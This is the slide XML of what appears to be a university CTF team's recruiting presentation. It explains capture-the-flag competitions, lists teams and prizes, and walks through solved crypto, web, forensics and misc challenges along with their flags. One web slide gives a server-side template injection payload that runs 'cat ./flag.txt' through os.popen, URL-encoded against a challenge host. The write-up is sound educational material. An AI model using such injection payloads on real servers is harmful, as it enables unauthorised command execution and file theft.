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99" r:id="rId35"/>
    <p:sldId id="300" r:id="rId36"/>
    <p:sldId id="301" r:id="rId37"/>
    <p:sldId id="294" r:id="rId38"/>
    <p:sldId id="295" r:id="rId39"/>
    <p:sldId id="296" r:id="rId40"/>
    <p:sldId id="297" r:id="rId41"/>
    <p:sldId id="298" r:id="rId42"/>
    <p:sldId id="290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288" r:id="rId56"/>
    <p:sldId id="291" r:id="rId57"/>
    <p:sldId id="292" r:id="rId58"/>
    <p:sldId id="293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3C806-5DE6-4339-8CC2-B674BC7C38C0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BB01E-1409-4602-834C-E028CA3C633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004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3C806-5DE6-4339-8CC2-B674BC7C38C0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BB01E-1409-4602-834C-E028CA3C6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79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3C806-5DE6-4339-8CC2-B674BC7C38C0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BB01E-1409-4602-834C-E028CA3C6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67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3C806-5DE6-4339-8CC2-B674BC7C38C0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BB01E-1409-4602-834C-E028CA3C6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23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3C806-5DE6-4339-8CC2-B674BC7C38C0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BB01E-1409-4602-834C-E028CA3C633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979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3C806-5DE6-4339-8CC2-B674BC7C38C0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BB01E-1409-4602-834C-E028CA3C6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28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3C806-5DE6-4339-8CC2-B674BC7C38C0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BB01E-1409-4602-834C-E028CA3C6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98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3C806-5DE6-4339-8CC2-B674BC7C38C0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BB01E-1409-4602-834C-E028CA3C6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02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3C806-5DE6-4339-8CC2-B674BC7C38C0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BB01E-1409-4602-834C-E028CA3C6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4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43C806-5DE6-4339-8CC2-B674BC7C38C0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5BB01E-1409-4602-834C-E028CA3C6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44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3C806-5DE6-4339-8CC2-B674BC7C38C0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BB01E-1409-4602-834C-E028CA3C6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41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43C806-5DE6-4339-8CC2-B674BC7C38C0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5BB01E-1409-4602-834C-E028CA3C633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746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hrislgarry/Apollo-11/blob/master/Comanche055/STAR_TABLES.agc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opensource.apple.com/source/Libc/Libc-1044.1.2/stdlib/FreeBSD/rand.c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Jordan-Peterson/CTF_PCAPS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pus1.com/www/whitepapers/whatswrongwithwep.pdf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27F4B-D840-4422-BB5B-C1317BF6EA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Towards an official CTF Team of CSU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BD3B53-D5F9-4B7B-89D0-576A1800FE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Vitamin G</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2596249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8BFBF-3AD1-4F74-9EF2-B40E6E083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9C603-6FD1-45C5-99E4-3AB022FAA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err="1"/>
              <a:t>Perfect_blue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - MIT, UMD + others - 12 members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Batman’s Kitchen - University of Washington - 13 members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err="1"/>
              <a:t>BitsForEveryone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - United States Military Academy (West Point) - 28 members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WPICSC - Worcester Polytechnic Institute - 8 members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Cyber Grizzlies - Cornell -7 members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err="1"/>
              <a:t>SIGPwny</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -  University of Illinois at Urbana-Champaign - 6 members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us – 4 members (revised to 3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="368208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2A75F-DA26-4A81-8EA4-F3C881392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Enough talk…</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="6600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="6600" dirty="0"/>
              <a:t>Lets see some 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2A685-2191-4711-B60C-A7FC6DAE0C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801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CB533-F55C-4FF4-83F2-BF31F0A95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Crypto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87E89-616A-4B90-885B-A0786427A7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72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6AEE-D970-4D3A-A615-167F3C656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EC164-433E-4BC2-85B3-CF47FAAC3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845823A-CBED-40FC-86E9-6B5E14CAC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852" y="2020994"/>
            <a:ext cx="4524375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446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1CE36-2454-4586-92AD-F2B4E207A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58266-3BE5-49DE-84DD-B364E2839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RITSEC {https: //github.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>clayball</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/something-useful-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ritsec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}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685F7E-CC15-4083-8958-24D1D41A9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511674"/>
            <a:ext cx="9732258" cy="452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4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7065-DD42-4D17-8866-87A3BB3A1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ns face&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33B4B56B-F136-4C5C-8E8A-3CF32CF18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36" y="2552624"/>
            <a:ext cx="5342083" cy="876376"/>
          </a:xfr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C0F49852-FD3C-4512-9267-A3D13D198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516" y="2006443"/>
            <a:ext cx="4208164" cy="379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71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A6B69B-B9D7-4129-88DD-89514D99E7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987566"/>
            <a:ext cx="10905066" cy="436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15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84B70D5-875B-433D-BDBD-1522A85D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F1B69-17FD-4D25-9339-B31D6B91B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44CA8E3-706D-4280-B28C-51999EC0F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98" y="640081"/>
            <a:ext cx="4416403" cy="531440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47DF4A-614C-4B4C-8B80-E5B9D8E8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33BE69A-412A-4171-9166-A4930261AD04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6768445" y="4085616"/>
            <a:ext cx="4781297" cy="178347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FGRUSELIGE KULTE UND ALTE?CH?F repeat REN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Google Translate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RITSEC{CREEPY CULT AND OLD CIPHERS}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299956-A9E7-4FC1-A0B1-D590CA97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FC539C-B783-4B03-9F9E-D13430F3F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Content Placeholder 4" descr="A close up of a mans face&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B07B2C4-83BD-4CFB-A33C-C88FF2ECD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051" y="2720649"/>
            <a:ext cx="5342083" cy="8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83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73F7A-438E-4F56-9C1D-FAFFE6D20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0D3B2-0F7A-4719-88C3-8CE7D064E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78E2F2E-6CCE-41E0-9D22-F357012E1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574" y="1845733"/>
            <a:ext cx="4700486" cy="403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069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8BFD8-5CBE-4052-81EB-4ECDAF7DE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A62FD-8A34-45CF-AACF-5C7C97C7F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n = 5196832088920565976847626600109930685983685377698793940303688567224093844213838345196177721067370218315332090523532228920532139397652718602647376176214689</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pt-BR" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="pt-BR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>e1 = 15</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pt-BR" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="pt-BR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>e2 = 13</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pt-BR" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="pt-BR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>c1 = 2042084937526293083328581576825435106672034183860987592520636048680382212041801675344422421233222921527377650749831658168085014081281116990629250092000069</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pt-BR" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="pt-BR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>c2 = 199621218068987060560259773620211396108271911964032609729865342591708524675430090445150449567825472793342358513366241310112450278540477486174011171344408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505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5BA09-E952-42F2-BD4E-86326E0CE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8E25D-5D1C-47DD-8E6F-F73D2B086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We are wannabe hackers...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The “G” is for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Gersch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Dr. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Gersch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Current members -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CEO and founder - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Saptarshi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Chatterjee - OG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Diptendu Kar - 0x0FF537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err="1"/>
              <a:t>Subhojeet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Mukherjee - j4l_$h0vn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Captain - Jordan Peterson - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>AirJordan</a:t>
            </a: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37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B36D10-1401-4D65-8FF9-F5DFD9287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FE5DDD-6DDF-4079-A92B-B9560DF4B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079" y="645106"/>
            <a:ext cx="4709852" cy="524774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F27B0-C7C6-4CCE-95EE-ED75E2813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42588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89F59-3B44-420B-8DCB-BCA54A067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44A20-EDE3-40D4-AA3E-316CAA190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CB60EB-FD3C-452B-BB15-BDDFD2610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18" y="641298"/>
            <a:ext cx="12192000" cy="30387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435494-E316-4A5C-8CCE-E3EA19476717}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3355547" y="4578635"/>
            <a:ext cx="5772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83838"/>
                </a:solidFill>
                <a:latin typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>TUCTF{Y0U_SH0ULDNT_R3US3_TH3_M0DULUS}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983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46202-5280-49DF-A340-018FE4D2D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100BE-BC74-422D-B640-178802AB8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B3566F-8FD3-4D4A-8DDF-F17C7FE07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92" y="2048989"/>
            <a:ext cx="1069657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29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84B70D5-875B-433D-BDBD-1522A85D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04C9F3-FE21-4671-9FD9-FE1D4384D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8684B9-6609-4744-8B0C-A49B18EDD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7" y="963038"/>
            <a:ext cx="7482953" cy="499029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47DF4A-614C-4B4C-8B80-E5B9D8E8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C9020-B9AD-4EF8-ADD3-3A5C57E9E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299956-A9E7-4FC1-A0B1-D590CA97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FC539C-B783-4B03-9F9E-D13430F3F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6BEA28-21C5-4785-9369-48352FE56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445" y="631088"/>
            <a:ext cx="4181555" cy="551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55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A5FA0-4716-46DE-AD69-EA66682EF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6C6757-DCCA-4547-A613-D8F9ABFAB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49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EDEA6-5695-47DC-BB83-5D8976F84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08303F1-6126-4889-9DFB-485A24417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506" y="492220"/>
            <a:ext cx="413385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3D034F-78AD-46FF-BA2E-F03B5E3E1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14196A8B-773F-499E-9E5C-DEFD8328A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3677169"/>
            <a:ext cx="97536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189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A089D-4337-41F6-AD31-684060F53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3A567-0EC8-4938-8976-C03475644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8C6953D-D736-4048-9D89-051F19EC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752" y="2109576"/>
            <a:ext cx="46863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840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A24BB-A161-457C-8D44-6937C9D88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803D6-034B-4743-864C-3092C2177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5368B6E-5DEF-4B91-927D-87EA8B2E7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47713"/>
            <a:ext cx="9753600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093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764ED-9E36-4EC6-B410-D9A3B979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1BF17-C5F1-4613-A4B1-4C24FD6C9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744FB16-ADAD-4081-8C68-300DD6395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57238"/>
            <a:ext cx="9753600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818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BF22A-941C-4607-B226-A43581EAE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D8B5C-2698-450D-BF2A-4B4773C4A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3EEF6B56-ECCB-4CFB-B7DE-E918CDE43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1214332"/>
            <a:ext cx="9753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E16E98FC-2082-4CAB-9FD3-F6BE7A2D2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624032"/>
            <a:ext cx="975360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44266E4E-BC6A-4771-824D-9D9D558D8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4230794"/>
            <a:ext cx="97536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633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2DCB4-A10A-45A1-9305-D1BB50D47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CTF?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E5E4F-DCAD-4400-9CCE-E61571610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It is a game. (cybersecurity competition)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A TEAM game.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Requirements –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Team.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Skills.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Strategies.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Same mentality.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="252548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A30DA-8726-4CC9-BC23-7BE728078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EC001-743F-419A-A424-58E9B0386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{%import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>os</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>%}{{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>os.popen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(« cat ./flag.txt »).read()}}</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> encoding to it and access the webpage:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>%7B%import%20os%%7D%7B%7Bos.popen(%22cat%20.%2Fflag.txt%22).read()%7D%7D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Full url:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://chal.tuctf.com:30007/welcome/%7B%import%20os%%7D%7B%7Bos.popen(%22cat%20.%2Fflag.txt%22).read()%7D%7D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272" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{805EB33E-8827-407C-ADFC-3BD8EE964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790" y="4323073"/>
            <a:ext cx="8293133" cy="71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245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6A548-BDAA-4C6A-9569-EC09119B6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96CC5-B671-40D2-803B-FB5E4FB70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Image">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2BD16E2-781E-4538-9938-0E187D444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360" y="1876214"/>
            <a:ext cx="474345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536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CFAF7-5B8F-470C-BFED-ED656F7F6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81C2D-0EF5-40CA-BE81-281C36EA79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Image2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8613FEED-2748-4FFB-9939-6F1145AA0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1385888"/>
            <a:ext cx="110966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7637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F1E98-93E9-417B-B15E-B3CD4E496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29C70-2B8E-4A75-9959-87055E2084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185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9A110-56C9-4290-BE04-BB1E76A3B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D0506-BB89-4A86-B414-83BF50FB3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9BDEA6-6024-4C46-AE3A-8BEA8DD4A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55" y="2491497"/>
            <a:ext cx="1045845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512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3913C8-44EF-46A4-99FF-E9CFEB0C5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8DBA00-8DFA-478E-BC7E-9E9138050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92" y="645384"/>
            <a:ext cx="5451627" cy="52471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82109-8763-4E0C-BFF1-A2969FC2D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636" y="2206936"/>
            <a:ext cx="5127172" cy="3670180"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HINT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>If you lost your copy of 'STAR TABLES', you should be able to find the 'open source' version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752497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61BBB-0296-4359-9D3E-47A65E043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49B1A-ADAA-4697-8A9C-CADDAE438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 = [18, 5, 25, 1, 34, 18, 17, 28, 34, 20, 36, 17, 9, 28, 13, 32, 29, 17, 7, 16, 22, 11, 1, 5]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>y = [11, 26, 5, 33, 2, 25, 9, 20, 6, 15, 34, 16, 11, 12, 16, 26, 30, 16, 12, 13, 17, 18, 33, 29]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Land the lunar lander safely using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Star_tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> out there.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Apollo-11/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>STAR_TABLES.agc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> at master · </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>chrislgarry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/Apollo-11</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Write python code calculate Euclidean Distance for the points above, giving us the flag.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ritsec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>{leap_4_th3_stars}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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9328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356D2-267D-4D40-B956-BBBEA51C2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C4F2D-74D6-42B4-B3B9-C5707BF18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948615-F14E-4BF6-B9FD-DDE5BF315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404" y="1827569"/>
            <a:ext cx="5194570" cy="381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7500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F66CC-E23A-4D15-8156-E79E74D25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2A73D-95D4-45D1-9C62-642566713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only hint we got here is that there is a standard rand function that we had to use in order to generate a number from a given seed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://opensource.apple.com/source/Libc/Libc-1044.1.2/stdlib/FreeBSD/rand.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Had to modify this code to input the given seed and generate random numbers to provide the next seed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This would be done a few times after which we would get the flag.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3491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3D5C7-A15E-4E62-89F7-8047DFBCE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E348D-EB99-4604-AB0D-2E2E201E4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935E11B-192B-4E55-9049-082DF2219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43" y="2149814"/>
            <a:ext cx="9912619" cy="371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853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0AAA6-FD3B-451D-8B01-6B2233DB5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in it for you?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413EA-9F4D-4366-9FC6-4858AA33E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Money $$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err="1"/>
              <a:t>CyberSeed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> 2019 winners - $15,000 – 4 members.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Swag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Defcon badges, t-shirts etc.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Resume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Jobs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Learning new skills.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="355922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75D23-EB68-4919-8E8C-9D25B71F6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634A0AB-8097-4F4C-8183-FEADB833BC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097280" y="3534249"/>
            <a:ext cx="10408875" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F7F7F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On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DD1144"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo"/>
              </a:rPr>
              <a:t>chal.tuctf.com:30102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 a server presents the audacious with a 10-level challenge (level 0 ~ level 9).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There is no "save" functionality. Therefore, each try always starts from level 0.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8518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547E-597E-4110-A2F2-964D52C46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FEF85-69BB-4162-AB77-03650AAB5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Here we played a game with a server they were running. We would give a text, and its encoding would be available to us, along with the next encoding to solve.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We tried manually first and decided to get the encoding of “ABCDEFGHIJKLMNOPQRSTUVWXYZ”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We received an encoding response of [ '_|', '|_|', '|_', ']', '[]', '[', '-|', '|-|', '|-', '._|', '|._|', '|._', '.]', '[.]', '[.', '.-|', '|.-|', '|.-', 'v', '&gt;', '&lt;', '^', '.v', '.&gt;', '.&lt;', '.^' ]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After this we automate this by writing a simple socket program in python in order to play question and answer, because the response time of your decoding is vital.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4138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5B02F-DD65-48E6-9BFC-38EF3CB75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B0BF3-6F56-4C68-9749-33379ED48F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054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0DB94-DC67-4C47-AD30-EE02FFFB2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0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Misc: breaking zip file encryption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CEDD8D05-64DD-C146-99D0-D71226810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966" r="9009" b="-1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95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FDEF3E-B54D-A045-A0CD-5FDC5365F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06" b="29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904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D76759-6BE4-C142-BBE1-AA4DE8AC0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598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48E0BF66-55BC-C74F-BF82-D4F8D35DE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12" b="30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953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22E13C5-1587-1E4A-9A3A-8285C6040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117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867D83F7-2B0F-AA41-85B7-9639DA5DB0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816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241B099A-B452-6B46-88B8-D34EB4998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20" b="3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77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69E3F-1491-4E79-A7C3-CDC3D2F47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CTF Types and Categories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C3352-4761-4FF6-8D86-10513DEC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Cyber Skyline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NCL and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>CyberSeed</a:t>
            </a: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Categories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OSINT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Crypto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Password Cracking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Log Analysis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Network Traffic Analysis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Web Application Exploitation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Software Security – Reverse Engineering.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="411474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8CBCF7F9-DC41-4246-B5AB-E3FD3A6488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4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253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8E23E-BEBE-C346-B8A4-8CBBBCBBD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the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pcap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208C2-4E1D-FA43-A75A-118BD94CF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>
              <a:hlinkClick r:id="rId2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:hlinkClick r:id="rId2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:hlinkClick r:id="rId2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/Jordan-Peterson/CTF_PCAPS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454678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D115C-5E98-4949-AD72-7034D3D2D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wonder what my hotel neighbor is doing…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67078-841F-2F4E-A69D-0849F7F50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FOILED by WEP again, guess we give up right?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Aircrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-ng can help</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WEP is pretty outdated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bad key management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Small key size</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Much more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.opus1.com/www/whitepapers/whatswrongwithwep.pdf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0377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EFAE9-7C45-FA4E-A646-87663A8E3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A66A8-43D3-3D43-A19B-4618F956B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that we can see the IP packets, lets see what we can find:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1. Find out what IP: 192.168.0.100 was searching for</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2. How many protocols are in the capture?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3. What relative time did the ARP spoof start</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>4. What attack uses this ARP spoof technique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230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2F908-C39F-B340-8F9C-A57D23432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/>
              <a:t>ongrats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B7EFE-E407-CD4A-BD53-11462D7A8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410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84BEF-8258-4E9D-AE6E-93D214CD9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Reversing - Live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21770-5439-4AA9-AB7A-C93EDBC50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079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E077C-9989-4E6D-9F2D-9F465E865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1D485-4A29-4297-AD3B-1D5AF723C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If you like doing these stuff - join us.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Do not compromise your own studies for this.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You do not need to be an expert. We are all in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>learning phase.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Target – 2 members for each category. Priorities – WEB.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If you join – SHOW UP.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Next events – NCL, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CyberSeed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 2020 and others.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35775457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A165A-077F-4945-A456-81DA55A8F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Mail: vitaming@cs.colostate.edu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4C52D-98D3-49DF-A619-390BFA54AC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THANKS – TEAM VITAMIN G</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35193838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that's all folks">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B29EF06-4622-47B5-8B4B-AEDB32925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4" r="1" b="12909"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="643467" y="643467"/>
            <a:ext cx="10905066" cy="505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218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95611-5AF8-4F44-BDD9-5CD6B2381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CTF Types and Categories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FAF1C-59EA-4576-B801-BB5875673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All others NOT Cyber Skyline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Defcon, Google CTF, RITSEC, TUCTF …..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Categories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Crypto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Reverse Engineering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err="1"/>
              <a:t>Pwning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> – Shell code buffer overflow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Web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Misc. – Steganography, programming, Machine Learning (some)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Forensics</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="91841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640A4-3866-4418-A9B9-CAC1438BD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skills (we think so) and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0954F-61A6-4105-8B67-C35146670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Skills we think we have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err="1"/>
              <a:t>Saptarshi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
